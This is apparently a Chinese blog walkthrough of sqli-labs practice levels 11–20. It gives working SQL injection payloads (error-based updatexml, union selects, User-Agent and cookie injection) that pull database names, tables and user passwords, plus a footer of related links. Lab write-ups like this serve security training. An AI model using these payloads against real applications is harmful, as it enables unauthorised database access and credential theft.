sql-labs(11-20)

guowu6662024-05-11 8:25

1.less-11

1.判断类型

根据测试在使用 " 不会报错,' 会报错,所以他是字符型的并且被单引号闭合,而且只有用户

登陆成功才会显示数据。所以先尝试报错注入

2.爆数据库

bash 复制代码 
' and updatexml(2,concat(0x7e,(select database()),0x7e),2)--+

3.爆数据表

4.爆字段

5.爆数据

2.less-12

1.判断类型

经过测试发现是xx型,通过双引号闭合。 并且没有正常回显。

2.判断字段个数

3.获取当前的数据库

4.获取数据表

bash 复制代码 
") union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()--+
  1. 获取字段
bash 复制代码 
") union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'--+

6.获取数据

bash 复制代码 
") union select 1,group_concat(username,password) from users--+

3.less-13

1.判断类型

经过测试发现 是单引号闭合的xx型与less-12 大致相同。

4.less-14

与less-11类似

1.判断类型

2.判断字段个数

剩下步骤与less-13,less-12类似。

5.less-15

1.判断类型

经过测试发现只有登陆成功,失败的界面,尝试盲注,

由于手工比较麻烦可以使用sqlmap尝试。

6.less-16

也是布尔盲注操作同上。

7.less-17

出现数据 的 delete、update、insert直接用报错注入。

1.爆字段

bash 复制代码 
' and updatexml(2,concat(0x7e,(select database()),0x7e),0)#

2.爆数据表

bash 复制代码 
' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),1),1)--+

3.爆字段

bash 复制代码 
1' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1),1)--+

4.爆数据

会报错因为同一张表不能同时更新,查看。查看其他表不报错

8.less-18

使用正确的密码登陆发现出现UA信息,发现是UA注入,所以尝试报错注入,而且是单引号闭合

通过查看源码,拼接的sql语句要多加 )才能执行顺利。

爆数据库

sql语句

sql 复制代码 
INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('1',2,updatexml(1,concat(0x7e,(select database())),1))#', '192.168.190.1', 'Dhakkan')
bash 复制代码 
1',2,updatexml(1,concat(0x7e,(select database())),1))#

按步骤执行下去即可,其余 前面已有介绍,这里就不展示了。

9.less-19

与less-18类似,是refer注入

10.less-20

cookies注入 ,根据源代码, uname参数不可省。

爆数据库

bash 复制代码 
uname=admin'and updatexml(1,concat(1,(database()),1),2)--+

报数据表

bash 复制代码 
uname=admin'and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema="security" ),1),2)--+

爆字段

bash 复制代码 
uname=admin' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security' )),0)#

爆数据

bash 复制代码 
uname=admin' and updatexml(1,concat(0x7e,(select group_concat(password)from users )),0)#
相关推荐
HUGu RGIN7 分钟前
MySQL--》如何在MySQL中打造高效优化索引
android·mysql·adb
HackTwoHub1 小时前
AI大模型网关存在SQL注入、附 POC 复现、影响版本LiteLLM 1.81.16~1.83.7(CVE-2026-42208)
数据库·人工智能·sql·网络安全·系统安全·网络攻击模型·安全架构
l1t2 小时前
DeepSeek总结的DuckLake构建基于 SQL 原生表格式的下一代数据湖仓
数据库·sql
KmSH8umpK2 小时前
Redis分布式锁从原生手写到Redisson高阶落地,附线上死锁复盘优化方案进阶第八篇
数据库·redis·分布式
TDengine (老段)2 小时前
从施工监测到运营预警,桥科院用 TDengine 提升桥梁数据管理能力
大数据·数据库·物联网·时序数据库·tdengine·涛思数据
S1998_1997111609•X3 小时前
论mysql国盾shell-sfa犯罪行为集团下的分项工程及反向注入原理尐深度纳米算法下的鐌檵鄐鉎行为
网络·数据库·网络协议·百度·开闭原则
KmSH8umpK4 小时前
Redis分布式锁从原生手写到Redisson高阶落地,附线上死锁复盘优化方案进阶第七篇
数据库·redis·分布式
yaodong5185 小时前
不会Python也能数据分析:Gemini 3.1 Pro解决办公问题的SQL自动生成
python·sql·数据分析
BU摆烂会噶5 小时前
【LangGraph】持久化实现的三大能力——时间旅行
数据库·人工智能·python·postgresql·langchain
l1t6 小时前
DeepSeek总结的DuckLake 入门
数据库
热门推荐
01要裂开了!ChatGPT要手机号验证了?注册Codex要求验证电话号码怎么办?2026年登陆Codex要手机号验证的解决办法02GitHub 镜像站点03Codex 接入 DeepSeek API 完整配置文档04零基础教你claude code 接入 deepseek V405【AI】2026 年具身智能模型和世界模型总结06裂开!ChatGPT 居然开始要手机号验证,附详细解决方法07几个好用的ip纯净度检测网站082026年AI前瞻:量子AI、具身智能与科学发现的新纪元09CC-Switch & Claude 基于 Linux 服务器安装使用指南10在Windows 11上安装Docker的踩坑记录